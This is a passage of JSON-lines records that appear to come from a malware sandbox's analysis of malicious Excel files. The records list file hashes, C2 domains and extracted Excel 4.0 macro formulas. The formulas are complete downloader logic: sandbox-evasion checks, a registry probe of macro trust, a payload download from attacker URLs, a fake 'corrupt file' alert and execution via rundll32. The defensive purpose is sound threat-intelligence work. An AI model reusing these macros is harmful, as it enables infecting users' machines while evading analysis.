,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WdKsFEesFk\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0973ddcc512b6ff19566bbe892bbdca3a0073b3f54eb541270c4ef438ec59f9f"},"analysis":{"reported":"2020-04-09T16:14:47Z","score":10},"files":[{"filename":"0973ddcc512b6ff19566bbe892bbdca3a0073b3f54eb541270c4ef438ec59f9f","filesize":209920,"md5":"34a7a4cce77305b4bdd2bdb931e0d5bb","sha1":"8d0cf80dd110904516ba81c49ed9fae40b50a93f","sha256":"0973ddcc512b6ff19566bbe892bbdca3a0073b3f54eb541270c4ef438ec59f9f","sha512":"32f3569a00e33e9c3e5e221c5311704b39d9084e23154efc3e839e7ea361ed4fba55504d1d071ee2db1f7d02ca591f5a201142f9704734dc55b1fc8d038bdda1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0973ddcc512b6ff19566bbe892bbdca3a0073b3f54eb541270c4ef438ec59f9f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dSQ3FeH9S9\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"098d9900c9605cda3d085337b1fbe6ea8e455e4821ae28a5aaaaa1646273d6ce"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"098d9900c9605cda3d085337b1fbe6ea8e455e4821ae28a5aaaaa1646273d6ce","filesize":206336,"md5":"06c62eaec85b13b080c8427daf4ca55c","sha1":"5012c043987eef86680bc01e7bef420aaf2299da","sha256":"098d9900c9605cda3d085337b1fbe6ea8e455e4821ae28a5aaaaa1646273d6ce","sha512":"d47ba2b351443b558cbab5d2ae20d8a79e75dee57ce690f636be9f8ad0ebbb2376c118e173d0ebb187ab04f920d29f799557057e75b46057fe22a0a4371835c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"098d9900c9605cda3d085337b1fbe6ea8e455e4821ae28a5aaaaa1646273d6ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xPfsFRnsia\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"098f2f2356ae203cc24d7cffafb0d399490a1fcfc1d46423c01c0978eb38ac0b"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"098f2f2356ae203cc24d7cffafb0d399490a1fcfc1d46423c01c0978eb38ac0b","filesize":206336,"md5":"02452cd96c7b180fe3ef04d3b70f0b0a","sha1":"cebb67adc1fac77b58b8cc49f3444388a80f6a40","sha256":"098f2f2356ae203cc24d7cffafb0d399490a1fcfc1d46423c01c0978eb38ac0b","sha512":"5624285bdb6630a56fd9c39e14db1832ed33b51b46b0118b7bfea1b8d4806d8db83182292d3ca3cb934f4385afb62efa19fe2ed0268fe3398269b8309fd3d838","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"098f2f2356ae203cc24d7cffafb0d399490a1fcfc1d46423c01c0978eb38ac0b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GJYzWrubJb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09971fb4e9c83a3478df777d547cd5989b18bc3fba737be8d7c0b98a9528d4c4"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"09971fb4e9c83a3478df777d547cd5989b18bc3fba737be8d7c0b98a9528d4c4","filesize":225280,"md5":"72d769a1859e934f563cce2fe3d227aa","sha1":"7d0f91af0432555b29b69158c07e5d573ca498ad","sha256":"09971fb4e9c83a3478df777d547cd5989b18bc3fba737be8d7c0b98a9528d4c4","sha512":"cf53257cfc525551dbe3f51a0a07d8cda6deb0280c18605fe6d8010ceba426e110633236cb3c97f968cf38e5438b0f6bdd76e453e37133c253c035ad756e8c13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09971fb4e9c83a3478df777d547cd5989b18bc3fba737be8d7c0b98a9528d4c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qAF94MThbS\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"099b2e9fe232dd287d4a44ca3a5f9d7435c6c9dc64d6d8d767eadf4398cfeca4"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"099b2e9fe232dd287d4a44ca3a5f9d7435c6c9dc64d6d8d767eadf4398cfeca4","filesize":141824,"md5":"b7d0ca7e99102b2e282dd79f90f499f9","sha1":"065b76fb860b046e11482c8f959ea17e47b671c7","sha256":"099b2e9fe232dd287d4a44ca3a5f9d7435c6c9dc64d6d8d767eadf4398cfeca4","sha512":"4849eea18c43f44be526666f727f5223a73470e6e4a13d685cf60b0251ac377e00cf0dfa56e3e8a08a979460f7fc471e64a73185f11929edf47f9ad9fcf8b3a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"099b2e9fe232dd287d4a44ca3a5f9d7435c6c9dc64d6d8d767eadf4398cfeca4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"j0ThFdRACQ\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09ae3da62a4ca1f0b5be10f219a35915e429aaf786ffa6a05009141601706f0a"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"09ae3da62a4ca1f0b5be10f219a35915e429aaf786ffa6a05009141601706f0a","filesize":209920,"md5":"7ef892f0c98eaab10b0c9d0229275efb","sha1":"1e9277475cd64f1e4579ad2c43e76ccdf217f564","sha256":"09ae3da62a4ca1f0b5be10f219a35915e429aaf786ffa6a05009141601706f0a","sha512":"b7855bf51cfa872efa5e3af511f96b3ad07b01e60674cdc56e0fb28393340a3a562b3cb9fbeb120e6ef49ee5ac9461f5997d03d7f6cba161df74e9730c8f529a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09ae3da62a4ca1f0b5be10f219a35915e429aaf786ffa6a05009141601706f0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6rhFYjRnFg\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09c278becfe3cc4de8e9a3482cf416023dd4f28cf539e6ff40ead18a6752ea53"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"09c278becfe3cc4de8e9a3482cf416023dd4f28cf539e6ff40ead18a6752ea53","filesize":185344,"md5":"4a6ad30b57a913c28228669d1f1289ef","sha1":"da591781421ac194ec0898930483dbe2ac51f812","sha256":"09c278becfe3cc4de8e9a3482cf416023dd4f28cf539e6ff40ead18a6752ea53","sha512":"ad45304039b5407d55d70391961a5cd48bc23261fd9fe653cec0ad6a66655886fe019c7c9f846d60803dc38053d7fb9c457eda59ab6a497bbbe17bde8cbeb43f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09c278becfe3cc4de8e9a3482cf416023dd4f28cf539e6ff40ead18a6752ea53.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09c7b8dc44d2bd82fff96ab5c62d7fe464440d4c7d2d96e135ae03d6ba635a1a"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"09c7b8dc44d2bd82fff96ab5c62d7fe464440d4c7d2d96e135ae03d6ba635a1a","filesize":168960,"md5":"9314e15ca541ca7a71a27434402333d7","sha1":"7a944a517ec1efc35c742f53248af69b79700df2","sha256":"09c7b8dc44d2bd82fff96ab5c62d7fe464440d4c7d2d96e135ae03d6ba635a1a","sha512":"7aa3119da28ac7133949689d8f1d0cac60e5f5ce50f1b552ff5614d06979483dd6b37a6c304e8663fe07d40056ad1eb972aeccb1572b7c674411198ff22a90de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09c7b8dc44d2bd82fff96ab5c62d7fe464440d4c7d2d96e135ae03d6ba635a1a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gG9DWW6Tgu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09d4355adcd66a87e59807f59acd9a158d0f4a2f12864f7c2032d5ca3e2fb34f"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"09d4355adcd66a87e59807f59acd9a158d0f4a2f12864f7c2032d5ca3e2fb34f","filesize":209920,"md5":"6d98d9ead4257fa74c12a6aa8296797e","sha1":"fcafaf218584bddb34f924417dc201951fb25b70","sha256":"09d4355adcd66a87e59807f59acd9a158d0f4a2f12864f7c2032d5ca3e2fb34f","sha512":"b05a030fd02bf11062e2ea55a5102b4cde891431b32d0a20661947efc2c83e3c0a655a4d32e469473a0d29d2901faa908a47e1871a42f79d46f9dca9d2b068c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09d4355adcd66a87e59807f59acd9a158d0f4a2f12864f7c2032d5ca3e2fb34f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"48Wf9kXdp1\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09d7b4fa53ea2d8a1c9f9fff5c04be8b3cc23797bd2d690710a92735f5ff9ab9"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"09d7b4fa53ea2d8a1c9f9fff5c04be8b3cc23797bd2d690710a92735f5ff9ab9","filesize":167936,"md5":"77d87a4412097647ac0f54a4f7e3a2fc","sha1":"ed90f61efc4414f80d0f2b693af294d20ff0065d","sha256":"09d7b4fa53ea2d8a1c9f9fff5c04be8b3cc23797bd2d690710a92735f5ff9ab9","sha512":"1ee2b76ab5c9fb21a8ebcb48ff275a70db19941067175f16036f8aecc2a07da17efdb8576994c26e1f7ce82557b46b9b98bde5fab03c8de87944910bfa70ed43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09d7b4fa53ea2d8a1c9f9fff5c04be8b3cc23797bd2d690710a92735f5ff9ab9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i4vvLTyGrW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a1ce22c34101c41c7001829db89f6f949df0f997d38baf1578cea77fde6d439"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a1ce22c34101c41c7001829db89f6f949df0f997d38baf1578cea77fde6d439","filesize":209920,"md5":"0ae0237502d92cb689422ea1db6b29ba","sha1":"5331a2b034c24678d191b4c23db83a0cbfb0d883","sha256":"0a1ce22c34101c41c7001829db89f6f949df0f997d38baf1578cea77fde6d439","sha512":"78cce8c4de28783ad4b2ea8d53aa7395e24392f2b4fd38f916ca0922b0aa473eedca2fa51f096d87fca6b05039a7860df515b5375f3b181e64c723ba7d150e27","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a1ce22c34101c41c7001829db89f6f949df0f997d38baf1578cea77fde6d439.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ifJWuglW2p\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a2520383cca39f33a6441dd644085789fc227e029fcd6692bfaa0136922d8f1"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a2520383cca39f33a6441dd644085789fc227e029fcd6692bfaa0136922d8f1","filesize":144384,"md5":"cbd19854ff4359a9b6f9e5f30c69f818","sha1":"92e59d86c44786117a82414b0737d22d174c9982","sha256":"0a2520383cca39f33a6441dd644085789fc227e029fcd6692bfaa0136922d8f1","sha512":"2279ae7b2c12d5cfb7f5d4f5953e812b6d9999f1e0697de227966637913764801e31cedb83858dc1de75065175ba508a0bdb27ec950c47caf9474dd74f2260f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a2520383cca39f33a6441dd644085789fc227e029fcd6692bfaa0136922d8f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ea7yQ2lQQD\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a34cc0f1d97b50bc97b50289cac93cd88694fe174a83ab305f89c5fc69a0960"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a34cc0f1d97b50bc97b50289cac93cd88694fe174a83ab305f89c5fc69a0960","filesize":168960,"md5":"b988c4a3ea3d2d69a1996f85d20e9004","sha1":"3c558acc8312928db8a151b03ecd39e477b2a7cd","sha256":"0a34cc0f1d97b50bc97b50289cac93cd88694fe174a83ab305f89c5fc69a0960","sha512":"80638e303179700badd5b438d52688f53913fc16648e99440c9221081c2f08a4bb93bca33d66661cd9f16c9c62710e3e28599e84a81bc8899c67b1b4bcfb96a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a34cc0f1d97b50bc97b50289cac93cd88694fe174a83ab305f89c5fc69a0960.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Iy9fl3lQjZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a3b02ca155b96153b0f12f803783fe1fdca0c9685eb941fd39251bdbdd68c8d"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a3b02ca155b96153b0f12f803783fe1fdca0c9685eb941fd39251bdbdd68c8d","filesize":167936,"md5":"bbdd445335137ac5a30e905d606cfb8a","sha1":"b3498729f3630eaec012882fdacf09e6498e5339","sha256":"0a3b02ca155b96153b0f12f803783fe1fdca0c9685eb941fd39251bdbdd68c8d","sha512":"9406e29ace7724a691229bad7b6e2499267c56e37239a909faf7c61eea7a81553790b6e386d342d9f1f1a28d796ea9c44e54a00fed6d1feccae484d78b3f42b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a3b02ca155b96153b0f12f803783fe1fdca0c9685eb941fd39251bdbdd68c8d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, 